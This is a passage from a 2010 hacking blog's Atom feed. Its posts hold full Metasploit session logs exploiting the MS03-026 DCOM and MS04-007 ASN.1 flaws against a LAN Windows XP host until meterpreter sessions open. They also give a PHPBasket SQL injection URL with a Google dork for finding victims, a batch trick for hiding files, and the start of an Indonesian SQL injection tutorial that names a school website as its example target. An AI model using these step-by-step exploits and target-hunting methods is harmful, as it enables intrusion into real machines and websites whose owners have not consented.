<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-605449655022693477</id><updated>2011-08-16T20:09:18.901-07:00</updated><category term='tutor'/><title type='text'>["P-H-T"]</title><subtitle type='html'></subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://pantai11.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/605449655022693477/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://pantai11.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>["P-H-T"]</name><uri>http://www.blogger.com/profile/08176225590488967659</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>4</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-605449655022693477.post-2388914158907160310</id><published>2010-06-06T17:29:00.000-07:00</published><updated>2010-06-06T17:32:40.504-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='tutor'/><title type='text'>Metasploit Proof of Concept [ Linux ]</title><content type='html'>&lt;pre&gt;&lt;span style="font-family: monospace;"&gt;this is an old exploit but still works&lt;br /&gt;i have test it on Local Area Network here&lt;br /&gt;this exploit tested on &lt;/span&gt;&lt;span style="font-family: monospace;"&gt;Windows XP Service Pack 1&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: monospace;"&gt;&lt;br /&gt;[o] DCOM RPC Exploit (ms03_026_dcom)&lt;br /&gt;&lt;br /&gt;# Description&lt;br /&gt;This module exploits a stack overflow in the RPCSS service, this&lt;br /&gt;vulnerability was originally found by the Last Stage of Delirium&lt;br /&gt;research group and has bee widely exploited ever since. This module&lt;br /&gt;can exploit the English versions of Windows NT 4.0 SP3-6a, Windows&lt;br /&gt;2000, Windows XP, and Windows 2003 all in one request :)&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;root@ubuntu:~# ping 172.16.1.31&lt;br /&gt;PING 172.16.1.31 (172.16.1.31) 56(84) bytes of data.&lt;br /&gt;64 bytes from 172.16.1.31: icmp_seq=1 ttl=128 time=2.09 ms&lt;br /&gt;64 bytes from 172.16.1.31: icmp_seq=2 ttl=128 time=0.335 ms&lt;br /&gt;64 bytes from 172.16.1.31: icmp_seq=3 ttl=128 time=0.342 ms&lt;br /&gt;^C&lt;br /&gt;--- 172.16.1.31 ping statistics ---&lt;br /&gt;3 packets transmitted, 3 received, 0% packet loss, time 2005ms&lt;br /&gt;rtt min/avg/max/mdev = 0.335/0.922/2.091/0.826 ms&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;root@ubuntu:~# nmap -O -PN 172.16.1.31&lt;br /&gt;&lt;br /&gt;Starting Nmap 4.62 ( http://nmap.org ) at 2009-06-21 09:56 WIT&lt;br /&gt;Interesting ports on ******-******.kapukvalley.net (172.16.1.31):&lt;br /&gt;Not shown: 1710 closed ports&lt;br /&gt;PORT     STATE SERVICE&lt;br /&gt;135/tcp  open  msrpc&lt;br /&gt;139/tcp  open  netbios-ssn&lt;br /&gt;445/tcp  open  microsoft-ds&lt;br /&gt;1025/tcp open  NFS-or-IIS&lt;br /&gt;5000/tcp open  upnp&lt;br /&gt;MAC Address: 00:1C:F0:5A:98:AF (D-Link)&lt;br /&gt;Device type: general purpose&lt;br /&gt;Running: Microsoft Windows 2000&lt;br /&gt;OS details: Microsoft Windows 2000 SP0/SP1/SP2 or Windows XP SP0/SP1&lt;br /&gt;Network Distance: 1 hop&lt;br /&gt;&lt;br /&gt;OS detection performed. Please report any incorrect results at http://nmap.org/submit/ .&lt;br /&gt;Nmap done: 1 IP address (1 host up) scanned in 1.860 seconds&lt;br /&gt;&lt;br /&gt;root@ubuntu:~# cd /home/noge/pentest/metasploit/&lt;br /&gt;root@ubuntu:/home/noge/pentest/metasploit# ./msfconsole&lt;br /&gt;&lt;br /&gt;          |                    |      _) |&lt;br /&gt;__ `__ \   _ \ __|  _` |  __| __ \  |  _ \  | __|&lt;br /&gt;|   |   |  __/ |   (   |\__ \ |   | | (   | | |&lt;br /&gt;_|  _|  _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__|&lt;br /&gt;                        _|             &lt;br /&gt;&lt;br /&gt;&lt;br /&gt; =[ msf v3.3-dev&lt;br /&gt;+ -- --=[ 378 exploits - 234 payloads&lt;br /&gt;+ -- --=[ 20 encoders - 7 nops&lt;br /&gt; =[ 154 aux&lt;br /&gt;&lt;br /&gt;msf &gt; use windows/dcerpc/ms03_026_dcom&lt;br /&gt;msf exploit(ms03_026_dcom) &gt; set PAYLOAD windows/meterpreter/bind_tcp&lt;br /&gt;PAYLOAD =&gt; windows/meterpreter/bind_tcp&lt;br /&gt;msf exploit(ms03_026_dcom) &gt; show options&lt;br /&gt;&lt;br /&gt;Module options:&lt;br /&gt;&lt;br /&gt;Name   Current Setting  Required  Description   &lt;br /&gt;----   ---------------  --------  -----------   &lt;br /&gt;RHOST                   yes       The target address&lt;br /&gt;RPORT  135              yes       The target port&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Payload options (windows/meterpreter/bind_tcp):&lt;br /&gt;&lt;br /&gt;Name      Current Setting  Required  Description                     &lt;br /&gt;----      ---------------  --------  -----------                     &lt;br /&gt;EXITFUNC  thread           yes       Exit technique: seh, thread, process&lt;br /&gt;LPORT     4444             yes       The local port                  &lt;br /&gt;RHOST                      no        The target address              &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Exploit target:&lt;br /&gt;&lt;br /&gt;Id  Name                                &lt;br /&gt;--  ----                                &lt;br /&gt;0   Windows NT SP3-6a/2000/XP/2003 Universal&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;msf exploit(ms03_026_dcom) &gt; set RHOST 172.16.1.31&lt;br /&gt;RHOST =&gt; 172.16.1.31&lt;br /&gt;msf exploit(ms03_026_dcom) &gt; set TARGET 0&lt;br /&gt;TARGET =&gt; 0&lt;br /&gt;msf exploit(ms03_026_dcom) &gt; show options&lt;br /&gt;&lt;br /&gt;Module options:&lt;br /&gt;&lt;br /&gt;Name   Current Setting  Required  Description   &lt;br /&gt;----   ---------------  --------  -----------   &lt;br /&gt;RHOST  172.16.1.31      yes       The target address&lt;br /&gt;RPORT  135              yes       The target port&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Payload options (windows/meterpreter/bind_tcp):&lt;br /&gt;&lt;br /&gt;Name      Current Setting  Required  Description                     &lt;br /&gt;----      ---------------  --------  -----------                     &lt;br /&gt;EXITFUNC  thread           yes       Exit technique: seh, thread, process&lt;br /&gt;LPORT     4444             yes       The local port                  &lt;br /&gt;RHOST     172.16.1.31      no        The target address              &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Exploit target:&lt;br /&gt;&lt;br /&gt;Id  Name                                &lt;br /&gt;--  ----                                &lt;br /&gt;0   Windows NT SP3-6a/2000/XP/2003 Universal&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;msf exploit(ms03_026_dcom) &gt; exploit&lt;br /&gt;&lt;br /&gt;[*] Started bind handler&lt;br /&gt;[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...&lt;br /&gt;[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:172.16.1.31[135] ...&lt;br /&gt;[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:172.16.1.31[135] ...&lt;br /&gt;[*] Sending exploit ...&lt;br /&gt;[*] Transmitting intermediate stager for over-sized stage...(191 bytes)&lt;br /&gt;[*] The DCERPC service did not reply to our request&lt;br /&gt;[*] Sending stage (2650 bytes)&lt;br /&gt;[*] Sleeping before handling stage...&lt;br /&gt;[*] Uploading DLL (75787 bytes)...&lt;br /&gt;[*] Upload completed.&lt;br /&gt;[*] Meterpreter session 1 opened (172.16.1.12:38423 -&gt; 172.16.1.31:4444)&lt;br /&gt;&lt;br /&gt;meterpreter &gt; pwd&lt;br /&gt;C:\WINDOWS\system32&lt;br /&gt;meterpreter &gt; sysinfo&lt;br /&gt;Computer: ******-******&lt;br /&gt;OS      : Windows XP (Build 2600, Service Pack 1).&lt;br /&gt;meterpreter &gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;=============================================================================================&lt;br /&gt;&lt;/span&gt;&lt;span style="font-family: monospace;"&gt;=============================================================================================&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: monospace;"&gt;&lt;br /&gt;[o] KILLBILL SMB Exploit (ms04_007_killbill)&lt;br /&gt;&lt;br /&gt;# Description&lt;br /&gt;This is an exploit for a previously undisclosed vulnerability in the&lt;br /&gt;bit string decoding code in the Microsoft ASN.1 library. This&lt;br /&gt;vulnerability is not related to the bit string vulnerability&lt;br /&gt;described in eEye advisory AD20040210-2. Both vulnerabilities were&lt;br /&gt;fixed in the MS04-007 patch. You are only allowed one attempt with&lt;br /&gt;this vulnerability. If the payload fails to execute, the LSASS&lt;br /&gt;system service will crash and the target system will automatically&lt;br /&gt;reboot itself in 60 seconds. If the payload succeeeds, the system&lt;br /&gt;will no longer be able to process authentication requests, denying&lt;br /&gt;all attempts to login through SMB or at the console. A reboot is&lt;br /&gt;required to restore proper functioning of an exploited system. This&lt;br /&gt;exploit has been successfully tested with the win32/*/reverse_tcp&lt;br /&gt;payloads, however a few problems were encounted when using the&lt;br /&gt;equivalent bind payloads. Your mileage may vary.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;msf &gt; use windows/smb/ms04_007_killbill&lt;br /&gt;msf exploit(ms04_007_killbill) &gt; set PAYLOAD windows/meterpreter/bind_tcp&lt;br /&gt;PAYLOAD =&gt; windows/meterpreter/bind_tcp&lt;br /&gt;msf exploit(ms04_007_killbill) &gt; show options&lt;br /&gt;&lt;br /&gt;Module options:&lt;br /&gt;&lt;br /&gt;Name   Current Setting  Required  Description                   &lt;br /&gt;----   ---------------  --------  -----------                   &lt;br /&gt;PROTO  smb              yes       Which protocol to use: http or smb&lt;br /&gt;RHOST                   yes       The target address            &lt;br /&gt;RPORT  445              yes       Set the SMB service port      &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Payload options (windows/meterpreter/bind_tcp):&lt;br /&gt;&lt;br /&gt;Name      Current Setting  Required  Description                     &lt;br /&gt;----      ---------------  --------  -----------                     &lt;br /&gt;EXITFUNC  thread           yes       Exit technique: seh, thread, process&lt;br /&gt;LPORT     4444             yes       The local port                  &lt;br /&gt;RHOST                      no        The target address              &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Exploit target:&lt;br /&gt;&lt;br /&gt;Id  Name                                 &lt;br /&gt;--  ----                                 &lt;br /&gt;0   Windows 2000 SP2-SP4 + Windows XP SP0-SP1&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;msf exploit(ms04_007_killbill) &gt; set RHOST 172.16.1.31&lt;br /&gt;RHOST =&gt; 172.16.1.31&lt;br /&gt;msf exploit(ms04_007_killbill) &gt; show targets&lt;br /&gt;&lt;br /&gt;Exploit targets:&lt;br /&gt;&lt;br /&gt;Id  Name                                 &lt;br /&gt;--  ----                                 &lt;br /&gt;0   Windows 2000 SP2-SP4 + Windows XP SP0-SP1&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;msf exploit(ms04_007_killbill) &gt; set TARGET 0&lt;br /&gt;TARGET =&gt; 0&lt;br /&gt;msf exploit(ms04_007_killbill) &gt; show options&lt;br /&gt;&lt;br /&gt;Module options:&lt;br /&gt;&lt;br /&gt;Name   Current Setting  Required  Description                   &lt;br /&gt;----   ---------------  --------  -----------                   &lt;br /&gt;PROTO  smb              yes       Which protocol to use: http or smb&lt;br /&gt;RHOST  172.16.1.31      yes       The target address            &lt;br /&gt;RPORT  445              yes       Set the SMB service port      &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Payload options (windows/meterpreter/bind_tcp):&lt;br /&gt;&lt;br /&gt;Name      Current Setting  Required  Description                     &lt;br /&gt;----      ---------------  --------  -----------                     &lt;br /&gt;EXITFUNC  thread           yes       Exit technique: seh, thread, process&lt;br /&gt;LPORT     4444             yes       The local port                  &lt;br /&gt;RHOST     172.16.1.31      no        The target address              &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Exploit target:&lt;br /&gt;&lt;br /&gt;Id  Name                                 &lt;br /&gt;--  ----                                 &lt;br /&gt;0   Windows 2000 SP2-SP4 + Windows XP SP0-SP1&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;msf exploit(ms04_007_killbill) &gt; exploit&lt;br /&gt;&lt;br /&gt;[*] Started bind handler&lt;br /&gt;[*] Error: The server responded with error: STATUS_ACCESS_VIOLATION (Command=115 WordCount=0)&lt;br /&gt;[*] Transmitting intermediate stager for over-sized stage...(191 bytes)&lt;br /&gt;[*] Sending stage (2650 bytes)&lt;br /&gt;[*] Sleeping before handling stage...&lt;br /&gt;[*] Uploading DLL (75787 bytes)...&lt;br /&gt;[*] Upload completed.&lt;br /&gt;[*] Meterpreter session 3 opened (172.16.1.12:33484 -&gt; 172.16.1.31:4444)&lt;br /&gt;&lt;br /&gt;meterpreter &gt; sysinfo&lt;br /&gt;Computer: ******-******&lt;br /&gt;OS      : Windows XP (Build 2600, Service Pack 1).&lt;br /&gt;meterpreter &gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/605449655022693477-2388914158907160310?l=pantai11.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pantai11.blogspot.com/feeds/2388914158907160310/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://pantai11.blogspot.com/2010/06/metasploit-proof-of-concept-linux.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/605449655022693477/posts/default/2388914158907160310'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/605449655022693477/posts/default/2388914158907160310'/><link rel='alternate' type='text/html' href='http://pantai11.blogspot.com/2010/06/metasploit-proof-of-concept-linux.html' title='Metasploit Proof of Concept [ Linux ]'/><author><name>["P-H-T"]</name><uri>http://www.blogger.com/profile/08176225590488967659</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-605449655022693477.post-920807044158485500</id><published>2010-06-04T15:04:00.000-07:00</published><updated>2010-06-04T15:05:42.629-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='tutor'/><title type='text'>PHPBasket 4.0 - SQL Injection Vulnerability</title><content type='html'>[o] PHPBasket 4.0 SQL Injection Vulnerability&lt;br /&gt;Software : PHPBasket version 4.0&lt;br /&gt;Vendor   : http://www.phpbasket.com/&lt;br /&gt;Author   : NoGe&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;[o] Vulnerable file&lt;br /&gt;product.php&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;[o] Exploit&lt;br /&gt;http://localhost/[path]/product.php?cat_id=[sql]&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;[o] Dork&lt;br /&gt;"Powered by PHPBasket"&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/605449655022693477-920807044158485500?l=pantai11.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pantai11.blogspot.com/feeds/920807044158485500/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://pantai11.blogspot.com/2010/06/phpbasket-40-sql-injection.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/605449655022693477/posts/default/920807044158485500'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/605449655022693477/posts/default/920807044158485500'/><link rel='alternate' type='text/html' href='http://pantai11.blogspot.com/2010/06/phpbasket-40-sql-injection.html' title='PHPBasket 4.0 - SQL Injection Vulnerability'/><author><name>["P-H-T"]</name><uri>http://www.blogger.com/profile/08176225590488967659</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-605449655022693477.post-3517404398029456760</id><published>2010-06-04T14:57:00.000-07:00</published><updated>2010-06-04T14:59:44.882-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='tutor'/><title type='text'>Hidden Files and Folders</title><content type='html'>[x]&lt;br /&gt;&lt;br /&gt;how to hidden files or folders in windows without using any software?&lt;br /&gt;maybe this is an old trick but still good and works :)&lt;br /&gt;this trick will keep your files and folders hidden even you have choose option "show hidden files and folders" in "folder option" :p&lt;br /&gt;tested on windows xp and windows vista home premium&lt;br /&gt;&lt;br /&gt;[x]&lt;br /&gt;&lt;br /&gt;first write this script and save as open.bat&lt;br /&gt;&lt;br /&gt;attrib -a -s -h [ folder or file to hidden ]&lt;br /&gt;attrib -a -s -h open.bat&lt;br /&gt;attrib -a -s -h close.bat&lt;br /&gt;&lt;br /&gt;second write this script and save as close.bat&lt;br /&gt;&lt;br /&gt;attrib +a +s +h [ folder or file to hidden ]&lt;br /&gt;attrib +a +s +h open.bat&lt;br /&gt;attrib +a +s +h close.bat&lt;br /&gt;&lt;br /&gt;[x]&lt;br /&gt;&lt;br /&gt;script explaination&lt;br /&gt;&lt;br /&gt;attrib : displays or changes file attributes&lt;br /&gt;&lt;br /&gt;a : archive file attribute&lt;br /&gt;s : system file attribute&lt;br /&gt;h : hidden file attribute&lt;br /&gt;+ : sets an attribute&lt;br /&gt;- : clears an attribute&lt;br /&gt;&lt;br /&gt;attrib +a +s +h [ folder or file to hidden ]&lt;br /&gt;&lt;br /&gt;you can put your files or folders name there&lt;br /&gt;if you hidden a file dont forget to write down the file extention to&lt;br /&gt;&lt;br /&gt;example&lt;br /&gt;&lt;br /&gt;attrib +a +s +h pic.jpg &lt;== hidden file name&lt;br /&gt;attrib +a +s +h folderz &lt;== hidden folder name&lt;br /&gt;&lt;br /&gt;what about this two files?&lt;br /&gt;&lt;br /&gt;attrib +a +s +h open.bat &lt;== hidden open.bat&lt;br /&gt;attrib +a +s +h close.bat &lt;== hidden close.bat&lt;br /&gt;attrib -a -s -h open.bat &lt;== show open.bat&lt;br /&gt;attrib -a -s -h close.bat &lt;== show close.bat&lt;br /&gt;&lt;br /&gt;why we put this two files into the script to?&lt;br /&gt;we must hidden this files to or anyone will open your hidden stuff&lt;br /&gt;&lt;br /&gt;if you have many folder to hide you can add into the script like this&lt;br /&gt;&lt;br /&gt;add this into close.bat&lt;br /&gt;&lt;br /&gt;attrib +a +s +h folder1&lt;br /&gt;attrib +a +s +h folder2&lt;br /&gt;attrib +a +s +h folder3&lt;br /&gt;&lt;br /&gt;dont forget to add into open.bat to&lt;br /&gt;&lt;br /&gt;attrib -a -s -h folder1&lt;br /&gt;attrib -a -s -h folder2&lt;br /&gt;attrib -a -s -h folder3&lt;br /&gt;&lt;br /&gt;[x]&lt;br /&gt;&lt;br /&gt;how to show it again?&lt;br /&gt;you must have WINRAR to show your hidden stuff&lt;br /&gt;open WINRAR and go to folder or drive where you hidden your stuff&lt;br /&gt;WINRAR will show all hidden files or folders include open.bat and close.bat&lt;br /&gt;click open.bat to show all your hidden stuff&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/605449655022693477-3517404398029456760?l=pantai11.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pantai11.blogspot.com/feeds/3517404398029456760/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://pantai11.blogspot.com/2010/06/hidden-files-and-folders.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/605449655022693477/posts/default/3517404398029456760'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/605449655022693477/posts/default/3517404398029456760'/><link rel='alternate' type='text/html' href='http://pantai11.blogspot.com/2010/06/hidden-files-and-folders.html' title='Hidden Files and Folders'/><author><name>["P-H-T"]</name><uri>http://www.blogger.com/profile/08176225590488967659</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-605449655022693477.post-5599920914729825327</id><published>2010-06-02T17:58:00.001-07:00</published><updated>2010-06-02T18:08:10.046-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='tutor'/><title type='text'>Simple SQL</title><content type='html'>&lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-US"&gt;Wellcome friend…&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-US"&gt;Ini pertama kalinya saya mencoba untuk menulis dalam sebuah blog,jadi kalo masih banyak kekurangan jangan gebugin saya..tapi kalo ada kelebihan, silahkan donate ke rekening saya…:P&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-US"&gt;&lt;!--[if !supportEmptyParas]--&gt; &lt;!--[endif]--&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-US"&gt;Pertama saya akan mencoba menjelaskan tentang SQL injection,tapi cuma dikit aja maslahnya belum ada yg donate sich…&lt;/span&gt;&lt;span  lang="EN-US" style="font-family:Wingdings;"&gt;&lt;span style=""&gt;J&lt;/span&gt;&lt;/span&gt;&lt;span style="" lang="EN-US"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-US"&gt;Kalo master² mau nambahin silahkan….&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-US"&gt;Kalo temen² mau kasih comment, boleh aja tapi donate dulu…xixixiixxi&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-US"&gt;&lt;!--[if !supportEmptyParas]--&gt; &lt;!--[endif]--&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-US"&gt;Ok,langsung aja degh…&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-US"&gt;&lt;!--[if !supportEmptyParas]--&gt; &lt;!--[endif]--&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal" style="margin-left: 36pt; text-indent: -18pt;"&gt;&lt;!--[if !supportLists]--&gt;&lt;b style="color: rgb(255, 0, 0);"&gt;&lt;span  lang="EN-US" style="font-size:16;"&gt;1.&lt;span style=""&gt;    &lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;!--[endif]--&gt;&lt;b&gt;&lt;span  lang="EN-US" style="font-size:16;"&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;About Sql Injection&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;Sql Injection merupakan trik untuk menyuntikan air uang(translated)..hihihi salah.maksudnya menyuntikan Permintaan SQL / perintah sebagai masukan yg&lt;span style=""&gt;  &lt;/span&gt;memungkin melalui halaman web ataupun melalui url.&lt;/p&gt;   &lt;p class="MsoNormal"&gt;Singkat kan??makanya donate,biar saya punya cukup uang buat makan dan cukup tenaga buat ngetik…xixixixi. Ujung²nya suruh donate juga…&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;J&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-US"&gt;&lt;!--[if !supportEmptyParas]--&gt; &lt;!--[endif]--&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal" style="margin-left: 36pt; text-indent: -18pt;"&gt;&lt;!--[if !supportLists]--&gt;&lt;b style="color: rgb(255, 255, 51);"&gt;&lt;span  lang="EN-US" style="font-size:16;"&gt;2.&lt;span style=""&gt;    &lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;!--[endif]--&gt;&lt;b&gt;&lt;span  lang="EN-US" style="font-size:16;"&gt;&lt;span style="color: rgb(255, 255, 51);"&gt;Apa yg di butuhkan?&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-US"&gt;3 Kg&lt;span style=""&gt;  &lt;/span&gt;tepung imajinasi, 1,5 Kg kreatifitas, 800 gram logika, 400 gram kesabaran.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-US"&gt;Dan yg paling penting harus ada koneksi internet dan web browser apapun. Dan jangan lupa juga 2 bungkus mallboro mix dan 1 botol bir.&lt;/span&gt;&lt;span  lang="EN-US" style="font-family:Wingdings;"&gt;&lt;span style=""&gt;J&lt;/span&gt;&lt;/span&gt;&lt;span style="" lang="EN-US"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-US"&gt;&lt;!--[if !supportEmptyParas]--&gt; &lt;!--[endif]--&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal" style="margin-left: 36pt; text-indent: -18pt;"&gt;&lt;!--[if !supportLists]--&gt;&lt;b style="color: rgb(0, 0, 153);"&gt;&lt;span  lang="EN-US" style="font-size:16;"&gt;3.&lt;span style=""&gt;    &lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;!--[endif]--&gt;&lt;b&gt;&lt;span  lang="EN-US" style="font-size:16;"&gt;&lt;span style="color: rgb(0, 0, 153);"&gt;Apa yg harus kita cari??&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-US"&gt;Pertama kita cari warnet yg murah dulu ( bagi yg blom punya laptop,like me ),,trus cari tempat yg nyaman,ga terlalu dingin dan ga terlalu panas,,trus bubu aja disitu..hehehe..bcandanya maksa,,ga lucu geto loch…&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-US"&gt;Harap maklum..lagi kelaperan nih…&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-US"&gt;&lt;!--[if !supportEmptyParas]--&gt; &lt;!--[endif]--&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-US"&gt;Udah mulai serius nih,udah adzan subuh..xixixi ga ada hubungannya..&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-US"&gt;&lt;!--[if !supportEmptyParas]--&gt; &lt;!--[endif]--&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-US"&gt;Kita cari target di google dengan dork apa aja sesuka hati.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-US"&gt;Missal: site:com cilacap&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-US"&gt;Artinya kita mencari web .com dan yg mengandung kata cilacap.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-US"&gt;Missal kita dapet&lt;span style=""&gt;  &lt;/span&gt;&lt;b&gt;&lt;a href="http://sman1clp.com/"&gt;http://sman1clp.com&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" 